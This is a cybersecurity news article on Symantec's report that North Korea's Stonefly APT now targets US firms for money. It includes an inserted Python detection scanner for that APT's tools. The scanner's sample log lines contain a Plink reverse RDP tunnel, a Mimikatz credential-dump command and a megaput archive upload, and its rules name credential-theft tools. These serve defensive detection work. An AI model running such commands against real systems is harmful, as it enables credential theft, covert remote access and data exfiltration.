North Korea's 'Stonefly' APT Swarms US Private Co's. for Profit

Despite a $10 million bounty on one member, APT45 is not slowing down, pivoting from intelligence gathering to extorting funds for Kim Jong-Un's regime.


A well-known North Korean advanced persistent threat (APT) has shifted its focus to targeting private companies in the US for financial gain.

Researchers at Symantec's Threat Hunter Team said this week that the state-sponsored group it tracks as "Stonefly" (aka Andariel, APT45, Silent Chollima, and Onyx Sleet) is flouting an indictment and a $10 million bounty from the US Department of Justice (DoJ) in order to rack up more funds for the Kim Jong-Un regime.

"Sometimes when you see an indictment against a certain actor, they'll disappear or retool, even if they're based in another jurisdiction," Dick O'Brien, part of the Threat Hunter Team at Symantec, tells Dark Reading. "In this case, it seems to be very much business as usual for Stonefly."

Stonefly, which is part of North Korea's Reconnaissance General Bureau (RGB), mounted assaults on three organizations in the US in August, about a month after the DoJ moved against the group. The victims, the researchers noted, had "no obvious intelligence value," and were likely being prepped for a ransomware whammy — though the intrusions were detected before the endgame could play out.

The focus on snapping up funds is a relatively new flex for the group, Symantec researchers stressed, even though other North Korean APTs are dedicated to grifting foreign currency for the regime. Stonefly in the past targeted hospitals and other healthcare providers during the pandemic (which drew the DoJ scrutiny), and is known for going after high-value espionage targets like US Air Force bases, NASA's Office of Inspector General, and government organizations in China, South Korea, and Taiwan.

"This is a significant development for Stonefly," says O'Brien. "They're one of the more adept North Korean groups and have a history of compromising high-value targets. We previously considered them as something of an elite unit who wouldn't get involved in financial attacks. There's either increased pressure to raise money or they've been doing it all along and just haven't been detected until quite recently."

Look for Stonefly's IoCs to Swat Ransomware Attacks

With Stonefly now casting a wider net to siphon funds from unsuspecting private companies, it pays for everyday businesses that might not normally think of themselves as APT targets to get familiar with the group's indicators of compromise (IoCs). Stonefly's activity is, after all, likely much more prolific than just the campaigns flagged by Symantec.

"There are likely many more victims," O'Brien stresses. "The attacks we observed were only those mounted against our customers. The true figure is likely going to be multiples of this."

And there are many IoCs to incorporate into defenses. While the ransomware was never deployed in the August attacks, and the initial compromise path isn't clear, Stonefly still managed to smuggle in plenty of tools from its kit before being ultimately thwarted. Those tools, and the certificates used to sign them, can be used to fingerprint the group's activity.

"In several of the attacks, Stonefly's custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed," according to Symantec's blog post. "In addition … attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates that appear to be unique to this campaign."

The toolbox also included Nukebot, a backdoor capable of executing commands, downloading and uploading files, and taking screenshots; Mimikatz; two different keyloggers; the Sliver open source cross-platform penetration testing framework; the PuTTY SSH client; Plink (PuTTY's command-line connection tool, often used for tunneling); Megatools (a command-line client for the Mega cloud storage service, useful for exfiltration); a utility that takes snapshots of folder structures on a hard drive and saves them as HTML files; and FastReverseProxy (frp), which can expose local servers to the public Internet.
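Most of the tools above are legitimate or dual-use (PuTTY, Plink, frp, Megatools, Sliver), so a hash-based blocklist alone misses them; what stands out is how they are invoked: Plink with a remote port forward, an frp client pointed at a config file, Megatools pushing an archive out, Mimikatz modules on the command line. The following is an added example, not Symantec's code and not based on any indicator it published: a small scanner that runs over process-creation events and flags those invocation patterns. The log format (pipe-separated key=value pairs) and the sample events are constructed for illustration; the command-line patterns are assumptions drawn from each tool's public usage, not Stonefly-specific IoCs.

```python
import re
from dataclasses import dataclass

# Tool names come from the Symantec-described toolbox; the command-line
# patterns are assumptions based on each tool's documented usage, not
# indicators published by Symantec. Plink's -R flag is case-sensitive,
# so the tool name is matched case-insensitively but the flag is not.
RULES = [
    ("plink reverse tunnel", re.compile(r"(?i:\bplink(?:\.exe)?\b).*\s-R\s")),
    ("frp client (FastReverseProxy)", re.compile(r"\bfrpc(?:\.exe)?\b", re.I)),
    ("mimikatz credential dump", re.compile(r"mimikatz|sekurlsa::", re.I)),
    ("megatools upload", re.compile(r"\bmega(?:tools\s+put|put)(?:\.exe)?\b", re.I)),
]


@dataclass
class Hit:
    rule: str
    host: str
    command_line: str


def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def scan(lines):
    """Return a Hit for every event whose command line matches a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        cmd = event.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append(Hit(name, event.get("Host", "?"), cmd))
    return hits


# Constructed sample events (203.0.113.0/24 is a documentation range).
SAMPLE_LOGS = [
    "Host=WS01|Image=C:\\Users\\Public\\plink.exe|CommandLine=plink.exe -N -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.5 -pw Passw0rd",
    "Host=WS01|Image=C:\\ProgramData\\frpc.exe|CommandLine=frpc.exe -c frpc.ini",
    "Host=SRV02|Image=C:\\Windows\\System32\\svchost.exe|CommandLine=svchost.exe -k netsvcs",
    "Host=SRV02|Image=C:\\Temp\\m.exe|CommandLine=m.exe privilege::debug sekurlsa::logonpasswords exit",
    "Host=WS03|Image=C:\\Tools\\megaput.exe|CommandLine=megaput.exe --username x --password y C:\\Temp\\archive.7z",
    # Legitimate admin use of plink (no remote forward): should not fire.
    "Host=WS04|Image=C:\\Program Files\\PuTTY\\plink.exe|CommandLine=plink.exe -ssh admin@10.0.0.5",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"[{hit.rule}] {hit.host}: {hit.command_line}")
```

A hit here is a triage signal, not proof of compromise: an administrator running Plink or frp is common enough that the value is in correlating a match with the host (a workstation that has no business tunneling RDP) and with the other artifacts Symantec lists, such as the Preft/Dtrack backdoor and the fake Tableau signing certificate. The mimikatz rule is also the weakest of the four, since a renamed binary only trips it when the module names appear on the command line.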

About the Author

Tara Seals, Managing Editor, News, Dark Reading

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.
